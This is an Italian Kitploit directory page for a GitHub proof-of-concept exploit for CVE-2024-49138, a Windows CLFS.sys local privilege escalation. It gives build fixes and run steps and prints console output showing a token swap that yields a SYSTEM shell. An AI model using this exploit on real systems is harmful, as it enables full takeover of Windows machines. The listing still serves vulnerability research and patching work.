Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-49138-POC — Exploit proof-of-concept per CVE-2024-49138 in Windows CLFS.sys, che ottiene l'escalation dei privilegi locali alla shell di sistema tramite manipolazione dei token. | Kitploit
Strumenti/GitHubGitHub/bananoname/cve-2024-49138-poc
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitBinary Exploitation
GitHubbananoname/cve-2024-49138-poc

CVE-2024-49138-POC

Exploit proof-of-concept per CVE-2024-49138 in Windows CLFS.sys, che ottiene l'escalation dei privilegi locali alla shell di sistema tramite manipolazione dei token.

Vedi Repository
351 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-49138-POC

Risoluzione errore Decombine

root@kitploit:~
C:\Program Files\Microsoft Visual Studio\2022\Professional\MSBuild\Microsoft\VC\v170\Microsoft.CppBuild.targets(456,5): error MSB8020: The build tools for Visual Studio 2019 (Platform Toolset = 'v142') cannot be found. To build using the v142 build tools, please install Visual Studio 2019 build tools.  Alternatively, you may upgrade to the current Visual Studio tools by selecting the Project menu or right-click the solution, and then selecting "Retarget solution".

Opzione 1: Installare gli strumenti di compilazione v142 per Visual Studio 2022

1. Aprire il programma di installazione di Visual Studio:

Andare al menu Start e aprire il programma di installazione di Visual Studio.

2. Modificare l'installazione di Visual Studio:

Selezionare Visual Studio 2022 e fare clic su Modifica.

3. Installare il toolset richiesto:

Nella scheda Componenti singoli, cercare: MSVC v142 - VS 2019 C++ x64/x86 build tools Selezionarlo e fare clic su Installa. 4. Ricostruire il progetto: Una volta installato, ricostruire il progetto in Visual Studio 2022.

Proof of Concept che sfrutta CVE-2024-49138 in CLFS.sys.

CrowdStrike ha rilevato la vulnerabilità sfruttata attivamente da attori delle minacce.

Testato su Windows 11 23h2.

Un'analisi approfondita sarà fornita in un post dettagliato sul blog.

Compilare ed eseguire

Compilare la versione x64 Release.

Eseguire e ottenere una shell di sistema.

root@kitploit:~
PS C:\Users\IEUser\Desktop> whoami
windows11\ieuser
PS C:\Users\IEUser\Desktop> .\CVE-2024-49138-POC.exe
Directory created successfully: C:\temp
Directory created successfully: C:\temp
file opened successfully
AddLogContainer successful
hResource = 0x00007FF7CDB89080
hResource = 0x00007FF7CDB890A0
pResourceData = 0x00007FF7CDB890A0
Resource size: 65536 bytes
Resource written to output.bin successfully.
Kernel Base Address: 0xFFFFF80339800000
Kernel Name: ntoskrnl.exe
NtReadVirtualMemory = 0x00007FFFAF0EFB40
NtWriteVirtualMemory = 0x00007FFFAF0EFAA0
pcclfscontainer = 0x0000000002100000
address_to_write = 0xFFFFC201424CC2B2
Process priority set to REALTIME_PRIORITY_CLASS.
Thread priority set to the highest level: TIME_CRITICAL.
triggering vuln...CreateLogFile failed with error 6601
Process priority set to NORMAL_PRIORITY_CLASS.
Thread priority set to the highest level: THREAD_PRIORITY_NORMAL.
vuln triggered
reading base of ntoskrnl to check we have arbitrary read/write
buf = 0x0000000300905A4D
swapping tokens...
current token address = 0xFFFFC201423EC578
systemtoken = 0xFFFFD401F501C6E9
Overwriting process token..
token swapped. Restoring PreviousMode and spawning system shell...
Microsoft Windows [Version 10.0.22631.2861]
(c) Microsoft Corporation. All rights reserved.

C:\Users\IEUser\Desktop>whoami
nt authority\system

C:\Users\IEUser\Desktop>

systemshell

Scarica lo strumento